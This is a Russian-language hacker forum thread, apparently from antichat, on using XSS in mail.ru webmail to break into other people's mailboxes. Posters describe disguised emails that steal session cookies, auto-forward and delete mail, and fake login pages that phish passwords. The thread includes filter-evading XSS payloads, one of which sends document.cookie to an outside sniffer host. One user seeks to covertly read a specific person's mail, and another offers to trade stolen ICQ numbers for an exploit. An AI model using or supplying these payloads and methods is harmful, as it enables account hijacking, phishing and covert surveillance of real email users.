Берёшь абсолютно любое видео на античате, из раздела XSS и на примере mail.ru. Всё о чём шла речь выше - это способы запустить свой скрипт в браузере жертвы. На практике делается так, отправляется письмо в котором маскируется XSS.. Пользователь получает письмо от некой дамы, например "Katrin", с непонятной темой "MRA"... Девушек то все любят, да и намеки в каждой фразе видят, времена такие.. Открывает и читает: А пока он читает, работает код из этого же письма... Всё зависит от фантазии злоумышленника. Что это может быть??? Да что угодно. Самое банальное, это отправить куки на сниффер и ручками их подменить, а потом спокойно, не вводя никаких паролей попасть в чужой ящик. Никаких знаний практически не нужно, а XSS можно узнать у более сведующих товарищей. Более продвинутым считается написание скриптов, которые всё сделают за тебя.. Говоря конкретно о mail.ru по собственному опыту: копия всех писем имеющихся в ящике + настройка пересылки всех входящих на твой ящик + удаление письма с сервера. Юзер прочтёт, а при попытке обновить/удалить/переслать увидит надпись "Сообщение удалено с сервера"... Теперь иди свищи и рассказывай, что было, вот только куда-то делось.. Это очень трудоёмкая работа, требующая определенных навыков в програмировании и понимание основ взаимодействия с веб-сервером (запросы, методы аутентификации). Самые творческие и авантюрные личности идут ещё дальше =) Они используя XSS, перемещают пользователя на поддельную страничку.. Мол произошла ошибка, сессия потеряна.. Страничка в мейловском дизайне, ничего подозрительного, реклама как обычно... После ввода пароля реально перекидывает обратно в ящик... Вот только введённые вами данные уже ушли к хакеру на мыло. А можно всё совместить =) Вопрос ваших знаний.
Если ничего не изменилось, то защита имеется, но очень убогая. Всё сводится к проверке кук и реферера. Куки есть, а подделать рефку средствами php не проблема. Единственное что, опционально имеется возможность запрета заходов с разных IP в рамках одной сессии.
Drongo, нет-нет, теорию я то знаю, да и видео у меня есть про это, так вот как вообще заюзать сам вредоносный код, имею хсс в майле, можно подробнее
Отправил нижеследующее по аське Dronge, но пока ответа не дождался Хочу спросить по поводу XSS в Mail.Ru. Если я правильно понял, то вот такой вариант уже не катит: PHP: <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('1')> <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(2)> <img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')> <img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('4')> Я честно попробовал перебить это в десятичную кодировку, получилось что-то типа этого: PHP: <img src="http ://img.mail.ru /mail/ru/image s/dumb.gif>"on error=alert('TEXT' )> Поперебирал разные комбинации, но - облом. Был бы у меня декодер - я бы и в шестнадцатиричной попробовал. Вот я и хочу узнать, это у меня глюки (я, правда, сначала тестил под SP-2, и только потом под незапатченным IE6) или эту дыру заделали? Может, хотя бы намекнёшь, в какую сторону чесать репу? Я, блин, даже ответ на секретный вопрос знаю, но юзать его нельзя - чел мониторит ящик каждый день, ну и я тоже хотел бы рядом пристроиться))
Ну чтож... Продолжая демонстрировать интересные и не очень (кому как) способы обхода фильтра, выкладываю следующую XSS. Конечно же, в таком виде она уже не применима для @mail.ru, но... Code: <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript: img=new Image(); img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> В основе данной XSS лежит то, что многие браузеры, в частности IE и Opera, парсят XML. Фильтр пропускал эту конструкцию потому что не видел в ней слова javascript =) А вот браузер видел.. Взяв справочник по XML ты легко разберешься что и почему =)
вот запалнаю все как надо и код вставлаю а мне пишет Error in connect (SOCKET) 4о делат ктонит потскажет
А что если чувак пользуется оперой или мозилой.Как вы сбираетесь пиститЬ куки если он сохраняет их жезлом? В основном продвинутые админы мозилой пользуются а не ИЕ.
Значит так. Мне надо xss - любая(конешно кто щедрый и активную можно ). Бабла у меня нету и единственное что могу предложить это 3 шестизначки. Вот такие голимые у меня дела... вот. пишыте на ето: [email protected]